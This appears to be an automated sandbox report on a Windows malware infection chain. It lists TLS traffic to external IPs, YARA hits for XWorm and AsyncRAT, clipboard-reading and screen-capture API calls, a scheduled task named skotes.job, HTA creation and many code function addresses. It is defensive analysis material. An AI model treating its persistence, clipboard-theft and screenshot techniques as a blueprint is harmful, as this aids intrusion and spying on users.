Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50067 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50196 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50239 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50241 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:50244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.214.119:443 -> 192.168.2.6:50246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50277 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe

Code function: 11_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

11_2_00439020

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe

Code function: 11_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

11_2_00439020

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe

Code function: 11_2_004391E0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

11_2_004391E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window created: window name: CLIPBRDWNDCLASS

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 26.2.MvowLGc.exe.3083298.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 26.2.MvowLGc.exe.3083298.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 26.2.MvowLGc.exe.3078e08.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 26.2.MvowLGc.exe.3078e08.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.RegAsm.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 27.2.RegAsm.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 26.2.MvowLGc.exe.3083298.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 26.2.MvowLGc.exe.3083298.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 26.2.MvowLGc.exe.3078e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 26.2.MvowLGc.exe.3078e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000002.3393623748.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: b3d465ea47.exe, 00000028.00000002.2841741210.0000000000542000.00000002.00000001.01000000.0000001E.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8f255192-6
Source: b3d465ea47.exe, 00000028.00000002.2841741210.0000000000542000.00000002.00000001.01000000.0000001E.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_f3b078a5-4
Source: b3d465ea47.exe.7.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_38eb2c4f-6
Source: b3d465ea47.exe.7.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_88d8d9f5-0
Source: random[1].exe.7.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cc209163-4
Source: random[1].exe.7.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_78f4417e-5

Creates HTA files

Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe

File created: C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta

PE file contains section with special chars

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: .idata
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: .idata
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name:
Source: 1VB7gm8.exe.7.dr	Static PE information: section name:
Source: 1VB7gm8.exe.7.dr	Static PE information: section name: .idata
Source: 1VB7gm8.exe.7.dr	Static PE information: section name:
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name:
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name: .idata
Source: 1VB7gm8[1].exe.7.dr	Static PE information: section name:
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name:
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name: .idata
Source: 1VB7gm8.exe0.7.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\random.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E3E530	7_2_00E3E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E778BB	7_2_00E778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E78860	7_2_00E78860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E77049	7_2_00E77049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E34DE0	7_2_00E34DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E731A8	7_2_00E731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E72D10	7_2_00E72D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E7779B	7_2_00E7779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E67F36	7_2_00E67F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00E34B30	7_2_00E34B30
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 10_2_01620C38	10_2_01620C38
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 10_2_016209A1	10_2_016209A1
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 10_2_016209B0	10_2_016209B0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042C0C0	11_2_0042C0C0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004380CD	11_2_004380CD
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004258B0	11_2_004258B0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043E150	11_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00412159	11_2_00412159
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004321AB	11_2_004321AB
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0040BA60	11_2_0040BA60
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00419A00	11_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00446220	11_2_00446220
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00441310	11_2_00441310
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004293EE	11_2_004293EE
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043DE00	11_2_0043DE00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004456F0	11_2_004456F0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004436B9	11_2_004436B9
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00401040	11_2_00401040
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00410845	11_2_00410845
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00410050	11_2_00410050
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0040E830	11_2_0040E830
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00412830	11_2_00412830
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042D831	11_2_0042D831
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043B8D2	11_2_0043B8D2
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004378E7	11_2_004378E7
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004220F0	11_2_004220F0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004278B4	11_2_004278B4
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0041A8BA	11_2_0041A8BA
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043C0BF	11_2_0043C0BF
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00426150	11_2_00426150
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00436960	11_2_00436960
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00429970	11_2_00429970
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042B175	11_2_0042B175
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0041F100	11_2_0041F100
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0040C920	11_2_0040C920
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00433930	11_2_00433930
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0040B980	11_2_0040B980
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00408A40	11_2_00408A40
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0040A240	11_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042026A	11_2_0042026A
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004452C0	11_2_004452C0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00402AD0	11_2_00402AD0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004152F4	11_2_004152F4
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00435A86	11_2_00435A86
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00415A8F	11_2_00415A8F
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00432A8D	11_2_00432A8D
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00421A90	11_2_00421A90
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00423AB0	11_2_00423AB0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043DAB0	11_2_0043DAB0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043EB40	11_2_0043EB40
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00421350	11_2_00421350
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00438B00	11_2_00438B00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00445B00	11_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00432B2C	11_2_00432B2C
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0040E380	11_2_0040E380
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00412B90	11_2_00412B90
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00441BA0	11_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444C40	11_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00409460	11_2_00409460
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00418C20	11_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0040C4C0	11_2_0040C4C0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042C4D0	11_2_0042C4D0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004424D0	11_2_004424D0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004324E1	11_2_004324E1
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004034F0	11_2_004034F0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042C4F0	11_2_0042C4F0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0041BCF6	11_2_0041BCF6
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042B4B0	11_2_0042B4B0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0040B540	11_2_0040B540
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042ED44	11_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444D50	11_2_00444D50
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444D69	11_2_00444D69
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043D570	11_2_0043D570
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0041B500	11_2_0041B500
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00407D20	11_2_00407D20
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00442D3C	11_2_00442D3C
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042E53D	11_2_0042E53D
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004385C7	11_2_004385C7
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_004205BB	11_2_004205BB
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043F64E	11_2_0043F64E
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00426650	11_2_00426650
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444C40	11_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0041FE58	11_2_0041FE58
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00415E70	11_2_00415E70
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00445E70	11_2_00445E70
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444E70	11_2_00444E70
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444625	11_2_00444625
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043CE21	11_2_0043CE21
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043EE20	11_2_0043EE20
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0041DEF0	11_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00421680	11_2_00421680
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00403E90	11_2_00403E90
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00421EA0	11_2_00421EA0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00434EAB	11_2_00434EAB
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00408EB0	11_2_00408EB0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0042DF66	11_2_0042DF66
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00404772	11_2_00404772
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444F20	11_2_00444F20
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0043D7D0	11_2_0043D7D0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0041AFF7	11_2_0041AFF7
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_0041BF8A	11_2_0041BF8A
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00424F90	11_2_00424F90
